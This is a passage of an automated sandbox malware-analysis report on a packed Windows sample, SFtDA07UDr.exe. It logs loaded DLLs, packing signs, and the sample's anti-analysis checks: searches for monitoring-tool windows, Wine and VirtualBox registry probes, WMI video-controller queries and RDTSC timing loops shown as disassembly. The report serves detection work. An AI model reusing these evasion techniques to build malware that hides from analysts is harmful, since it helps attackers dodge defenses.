Source: C:\Users\user\Desktop\SFtDA07UDr.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Desktop\SFtDA07UDr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\SFtDA07UDr.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\SFtDA07UDr.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\SFtDA07UDr.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\SFtDA07UDr.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\SFtDA07UDr.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\SFtDA07UDr.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\SFtDA07UDr.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\SFtDA07UDr.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\SFtDA07UDr.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\SFtDA07UDr.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior

Source: SFtDA07UDr.exe

Static file information: File size 2911744 > 1048576

Source: SFtDA07UDr.exe

Static PE information: Raw size of rhgudopy is bigger than: 0x100000 < 0x29d200

Data Obfuscation

Detected unpacking (changes PE section rights)

Source: C:\Users\user\Desktop\SFtDA07UDr.exe

Unpacked PE file: 0.2.SFtDA07UDr.exe.af0000.0.unpack :EW;.rsrc :W;.idata :W;rhgudopy:EW;ahjutyme:EW;.taggant:EW; vs :ER;.rsrc :W;.idata :W;rhgudopy:EW;ahjutyme:EW;.taggant:EW;

Source: initial sample

Static PE information: section where entry point is pointing to: .taggant

Source: SFtDA07UDr.exe

Static PE information: real checksum: 0x2ce85c should be: 0x2d420c

Source: SFtDA07UDr.exe	Static PE information: section name:
Source: SFtDA07UDr.exe	Static PE information: section name: .rsrc
Source: SFtDA07UDr.exe	Static PE information: section name: .idata
Source: SFtDA07UDr.exe	Static PE information: section name: rhgudopy
Source: SFtDA07UDr.exe	Static PE information: section name: ahjutyme
Source: SFtDA07UDr.exe	Static PE information: section name: .taggant

Source: SFtDA07UDr.exe

Static PE information: section name: entropy: 7.982923087734826

Boot Survival

Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)

Source: C:\Users\user\Desktop\SFtDA07UDr.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\Desktop\SFtDA07UDr.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\Desktop\SFtDA07UDr.exe	Window searched: window name: RegmonClass	Jump to behavior
Source: C:\Users\user\Desktop\SFtDA07UDr.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\Desktop\SFtDA07UDr.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\Desktop\SFtDA07UDr.exe	Window searched: window name: Regmonclass	Jump to behavior
Source: C:\Users\user\Desktop\SFtDA07UDr.exe	Window searched: window name: Filemonclass	Jump to behavior
Source: C:\Users\user\Desktop\SFtDA07UDr.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior

Source: C:\Users\user\Desktop\SFtDA07UDr.exe	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate			Jump to behavior
Source: C:\Users\user\Desktop\SFtDA07UDr.exe	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot			Jump to behavior

Source: C:\Users\user\Desktop\SFtDA07UDr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Source: C:\Users\user\Desktop\SFtDA07UDr.exe

WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_VideoController

Query firmware table information (likely to detect VMs)

Source: C:\Users\user\Desktop\SFtDA07UDr.exe

System information queried: FirmwareTableInformation

Jump to behavior

Tries to detect sandboxes / dynamic malware analysis system (registry check)

Source: C:\Users\user\Desktop\SFtDA07UDr.exe	File opened: HKEY_CURRENT_USER\Software\Wine			Jump to behavior
Source: C:\Users\user\Desktop\SFtDA07UDr.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__			Jump to behavior

Tries to detect virtualization through RDTSC time measurements

Source: C:\Users\user\Desktop\SFtDA07UDr.exe	RDTSC instruction interceptor: First address: CBE6D5 second address: CBE6F7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 jmp 00007F768C6F8119h 0x0000000a push eax 0x0000000b push edx 0x0000000c push edi 0x0000000d pop edi 0x0000000e rdtsc
Source: C:\Users\user\Desktop\SFtDA07UDr.exe	RDTSC instruction interceptor: First address: CBE6F7 second address: CBE711 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F768C6F6316h 0x00000008 jmp 00007F768C6F631Bh 0x0000000d pop edx 0x0000000e pop eax 0x0000000f popad 0x00000010 pushad 0x00000011 push ebx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\SFtDA07UDr.exe	RDTSC instruction interceptor: First address: CBE711 second address: CBE71F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007F768C6F8106h 0x0000000a pop ebx 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\SFtDA07UDr.exe	RDTSC instruction interceptor: First address: CB86B7 second address: CB86C1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007F768C6F6316h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\SFtDA07UDr.exe	RDTSC instruction interceptor: First address: CB86C1 second address: CB86E7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F768C6F8113h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jmp 00007F768C6F810Fh 0x0000000e rdtsc
Source: C:\Users\user\Desktop\SFtDA07UDr.exe	RDTSC instruction interceptor: First address: CBD65D second address: CBD67A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F768C6F6322h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\SFtDA07UDr.exe	RDTSC instruction interceptor: First address: CBD67A second address: CBD680 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SFtDA07UDr.exe	RDTSC instruction interceptor: First address: CBD680 second address: CBD688 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 push edx 0x00000007 pop edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\SFtDA07UDr.exe	RDTSC instruction interceptor: First address: CBDAB2 second address: CBDAC4 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F768C6F8106h 0x00000008 push eax 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop ecx 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\SFtDA07UDr.exe	RDTSC instruction interceptor: First address: CBDAC4 second address: CBDACA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SFtDA07UDr.exe	RDTSC instruction interceptor: First address: CBDACA second address: CBDACE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SFtDA07UDr.exe	RDTSC instruction interceptor: First address: CBDACE second address: CBDAD2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SFtDA07UDr.exe	RDTSC instruction interceptor: First address: CBDC4C second address: CBDC59 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jo 00007F768C6F8106h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\SFtDA07UDr.exe	RDTSC instruction interceptor: First address: CBDC59 second address: CBDC76 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F768C6F6320h 0x0000000e push ecx 0x0000000f push edx 0x00000010 pop edx 0x00000011 pop ecx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\SFtDA07UDr.exe	RDTSC instruction interceptor: First address: CBDDDF second address: CBDDFE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F768C6F810Ch 0x00000007 jng 00007F768C6F8106h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push ebx 0x00000010 jnl 00007F768C6F8106h 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\SFtDA07UDr.exe	RDTSC instruction interceptor: First address: CBDF7B second address: CBDFAC instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F768C6F6316h 0x00000008 push eax 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop ecx 0x0000000d jne 00007F768C6F633Ch 0x00000013 push eax 0x00000014 pushad 0x00000015 popad 0x00000016 push eax 0x00000017 pop eax 0x00000018 pop eax 0x00000019 push eax 0x0000001a push edx 0x0000001b jmp 00007F768C6F6324h 0x00000020 pushad 0x00000021 popad 0x00000022 rdtsc
Source: C:\Users\user\Desktop\SFtDA07UDr.exe	RDTSC instruction interceptor: First address: CC01E0 second address: CC01E6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SFtDA07UDr.exe	RDTSC instruction interceptor: First address: CC02CB second address: CC02D1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SFtDA07UDr.exe	RDTSC instruction interceptor: First address: CC03B1 second address: CC0401 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F768C6F8108h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop eax 0x0000000d pushad 0x0000000e call 00007F768C6F8110h 0x00000013 adc dh, FFFFFFA5h 0x00000016 pop esi 0x00000017 add esi, dword ptr [ebp+122D2C8Ch] 0x0000001d popad 0x0000001e push 00000003h 0x00000020 mov dword ptr [ebp+122D3720h], ecx 0x00000026 push 00000000h 0x00000028 mov edx, dword ptr [ebp+12445475h] 0x0000002e push 00000003h 0x00000030 mov edi, dword ptr [ebp+122D3961h] 0x00000036 push 9D237B37h 0x0000003b push eax 0x0000003c push edx 0x0000003d jg 00007F768C6F8108h 0x00000043 rdtsc
Source: C:\Users\user\Desktop\SFtDA07UDr.exe	RDTSC instruction interceptor: First address: CC0401 second address: CC0431 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push esi 0x00000004 pop esi 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xor dword ptr [esp], 5D237B37h 0x0000000f mov esi, 05C3EABBh 0x00000014 lea ebx, dword ptr [ebp+1244B0C1h] 0x0000001a or dl, FFFFFFA4h 0x0000001d xchg eax, ebx 0x0000001e push eax 0x0000001f push edx 0x00000020 jmp 00007F768C6F6320h 0x00000025 rdtsc
Source: C:\Users\user\Desktop\SFtDA07UDr.exe	RDTSC instruction interceptor: First address: CC0431 second address: CC044B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F768C6F8115h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\SFtDA07UDr.exe	RDTSC instruction interceptor: First address: CC044B second address: CC045D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 jbe 00007F768C6F6320h 0x0000000e push eax 0x0000000f push edx 0x00000010 push ebx 0x00000011 pop ebx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\SFtDA07UDr.exe	RDTSC instruction interceptor: First address: CC04B9 second address: CC0508 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F768C6F8119h 0x0000000b popad 0x0000000c mov dword ptr [esp], eax 0x0000000f mov edx, dword ptr [ebp+122D1D6Fh] 0x00000015 push 00000000h 0x00000017 mov dword ptr [ebp+122D2DE9h], esi 0x0000001d call 00007F768C6F8109h 0x00000022 push eax 0x00000023 push edx 0x00000024 jmp 00007F768C6F8113h 0x00000029 rdtsc
Source: C:\Users\user\Desktop\SFtDA07UDr.exe	RDTSC instruction interceptor: First address: CC0508 second address: CC0522 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F768C6F6326h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\SFtDA07UDr.exe	RDTSC instruction interceptor: First address: CC0522 second address: CC0558 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jmp 00007F768C6F810Bh 0x0000000e mov eax, dword ptr [esp+04h] 0x00000012 jmp 00007F768C6F8112h 0x00000017 mov eax, dword ptr [eax] 0x00000019 pushad 0x0000001a pushad 0x0000001b jnc 00007F768C6F8106h 0x00000021 push eax 0x00000022 push edx 0x00000023 rdtsc
Source: C:\Users\user\Desktop\SFtDA07UDr.exe	RDTSC instruction interceptor: First address: CC0558 second address: CC0578 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jnp 00007F768C6F6318h 0x0000000b popad 0x0000000c mov dword ptr [esp+04h], eax 0x00000010 jng 00007F768C6F6333h 0x00000016 push eax 0x00000017 push edx 0x00000018 jno 00007F768C6F6316h 0x0000001e rdtsc
Source: C:\Users\user\Desktop\SFtDA07UDr.exe	RDTSC instruction interceptor: First address: CC0578 second address: CC0603 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F768C6F8111h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop eax 0x0000000a jno 00007F768C6F810Ch 0x00000010 push 00000003h 0x00000012 or edx, dword ptr [ebp+122D376Dh] 0x00000018 push 00000000h 0x0000001a push 00000000h 0x0000001c push ecx 0x0000001d call 00007F768C6F8108h 0x00000022 pop ecx 0x00000023 mov dword ptr [esp+04h], ecx 0x00000027 add dword ptr [esp+04h], 00000016h 0x0000002f inc ecx 0x00000030 push ecx 0x00000031 ret 0x00000032 pop ecx 0x00000033 ret 0x00000034 push 00000003h 0x00000036 sub dword ptr [ebp+122D2446h], eax 0x0000003c mov ecx, 68C68418h 0x00000041 call 00007F768C6F8109h 0x00000046 push edi 0x00000047 push ebx 0x00000048 jne 00007F768C6F8106h 0x0000004e pop ebx 0x0000004f pop edi 0x00000050 push eax 0x00000051 jmp 00007F768C6F810Ah 0x00000056 mov eax, dword ptr [esp+04h] 0x0000005a jmp 00007F768C6F810Bh 0x0000005f mov eax, dword ptr [eax] 0x00000061 push ebx 0x00000062 push eax 0x00000063 push edx 0x00000064 push edi 0x00000065 pop edi 0x00000066 rdtsc
Source: C:\Users\user\Desktop\SFtDA07UDr.exe	RDTSC instruction interceptor: First address: CD223A second address: CD2244 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnc 00007F768C6F6316h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\SFtDA07UDr.exe	RDTSC instruction interceptor: First address: CB016E second address: CB0183 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F768C6F8111h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\SFtDA07UDr.exe	RDTSC instruction interceptor: First address: CDEAB0 second address: CDEAB4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SFtDA07UDr.exe	RDTSC instruction interceptor: First address: CDED74 second address: CDED80 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push esi 0x0000000a pop esi 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\SFtDA07UDr.exe	RDTSC instruction interceptor: First address: CDED80 second address: CDED90 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 pop eax 0x00000005 push ebx 0x00000006 pop ebx 0x00000007 push edi 0x00000008 pop edi 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\SFtDA07UDr.exe	RDTSC instruction interceptor: First address: CDED90 second address: CDED94 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SFtDA07UDr.exe	RDTSC instruction interceptor: First address: CDF06E second address: CDF08E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F768C6F631Fh 0x00000009 pop esi 0x0000000a popad 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 jbe 00007F768C6F6316h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\SFtDA07UDr.exe	RDTSC instruction interceptor: First address: CDF08E second address: CDF092 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SFtDA07UDr.exe	RDTSC instruction interceptor: First address: CDF1D3 second address: CDF1D7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SFtDA07UDr.exe	RDTSC instruction interceptor: First address: CDF4F8 second address: CDF4FE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SFtDA07UDr.exe	RDTSC instruction interceptor: First address: CDF4FE second address: CDF535 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jmp 00007F768C6F631Eh 0x0000000d popad 0x0000000e pushad 0x0000000f jo 00007F768C6F6325h 0x00000015 push edx 0x00000016 pop edx 0x00000017 jmp 00007F768C6F631Dh 0x0000001c push eax 0x0000001d push edx 0x0000001e push edi 0x0000001f pop edi 0x00000020 jnc 00007F768C6F6316h 0x00000026 rdtsc
Source: C:\Users\user\Desktop\SFtDA07UDr.exe	RDTSC instruction interceptor: First address: CDF535 second address: CDF549 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 jl 00007F768C6F8106h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jp 00007F768C6F810Ch 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\SFtDA07UDr.exe	RDTSC instruction interceptor: First address: CDF83C second address: CDF840 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SFtDA07UDr.exe	RDTSC instruction interceptor: First address: CDF840 second address: CDF844 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SFtDA07UDr.exe	RDTSC instruction interceptor: First address: CDF844 second address: CDF84A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SFtDA07UDr.exe	RDTSC instruction interceptor: First address: CDF84A second address: CDF850 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SFtDA07UDr.exe	RDTSC instruction interceptor: First address: CB368E second address: CB36B7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F768C6F631Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a jg 00007F768C6F6316h 0x00000010 jo 00007F768C6F6316h 0x00000016 push esi 0x00000017 pop esi 0x00000018 popad 0x00000019 push eax 0x0000001a push edx 0x0000001b pushad 0x0000001c popad 0x0000001d push esi 0x0000001e pop esi 0x0000001f rdtsc
Source: C:\Users\user\Desktop\SFtDA07UDr.exe	RDTSC instruction interceptor: First address: CE03AB second address: CE03AF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SFtDA07UDr.exe	RDTSC instruction interceptor: First address: CE03AF second address: CE03B9 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\SFtDA07UDr.exe	RDTSC instruction interceptor: First address: CB1BB1 second address: CB1BB5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SFtDA07UDr.exe	RDTSC instruction interceptor: First address: CB1BB5 second address: CB1BBB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SFtDA07UDr.exe	RDTSC instruction interceptor: First address: CAAFD6 second address: CAAFF3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F768C6F8112h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\SFtDA07UDr.exe	RDTSC instruction interceptor: First address: CAAFF3 second address: CAAFF7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SFtDA07UDr.exe	RDTSC instruction interceptor: First address: CAAFF7 second address: CAB001 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F768C6F8106h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\SFtDA07UDr.exe	RDTSC instruction interceptor: First address: CE9678 second address: CE967C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
